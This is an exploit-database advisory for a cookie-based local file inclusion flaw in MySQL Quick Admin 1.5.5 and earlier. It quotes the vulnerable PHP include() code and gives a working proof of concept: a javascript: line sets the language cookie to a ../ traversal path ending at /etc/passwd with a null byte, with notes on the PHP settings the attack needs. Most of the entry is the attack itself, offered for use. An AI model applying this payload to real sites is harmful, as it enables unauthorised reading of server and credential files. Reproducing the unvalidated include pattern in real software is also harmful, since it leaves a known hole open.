MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability

Author
JosS
Risk
[ Security Risk Unsorted ]
0day-ID
0day-ID-3814
Category
web applications
Date added
30-09-2008
Platform
unsorted


# MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability
# url: http://www.mysqlquickadmin.com/
#
# Author: JosS
#
# This was written for educational purpose. Use it at your own risk.
# Author will be not responsible for any damage.
#
# Greetz To: Pepelux :)
#
# *Requirements: magic_quotes_gpc = Off (with it On the %00 null byte is escaped
#  to \0 and no longer truncates the "/lang.php" suffix). The null-byte
#  truncation itself also needs a PHP build older than 5.3.4, which started
#  rejecting NUL bytes in include() paths.

vuln file: /includes/required.php
vuln code: 

// the language cookie is copied into the session unvalidated; the !isset
// guard means the first value a session sees is the one that sticks
if(!empty($_COOKIE['language']) && !isset($_SESSION['language'])){
	$_SESSION['language'] = $_COOKIE['language'];
}

....

// the session value is then concatenated straight into an include() path
if(LANG == ""){
	if(!isset($_SESSION['language'])){
		include("lang/english/lang.php");
		$_LANG = "english";
	} else {
		// LFI: ../ traversal escapes lang/, %00 drops the /lang.php suffix
		include("lang/".$_SESSION['language']."/lang.php");
		$_LANG = $_SESSION['language'];
	}

... }

LFI (PoC): 
1) while on a page of the target site, set the cookie from the browser:
   javascript:document.cookie="language=../../../../../../../../../../etc/passwd%00; path=/";
2) then request /index.php (use a fresh session: the cookie is only copied
   into a session that has no language value yet)

Ingenious work :D



#  0day.today [2024-12-25]  #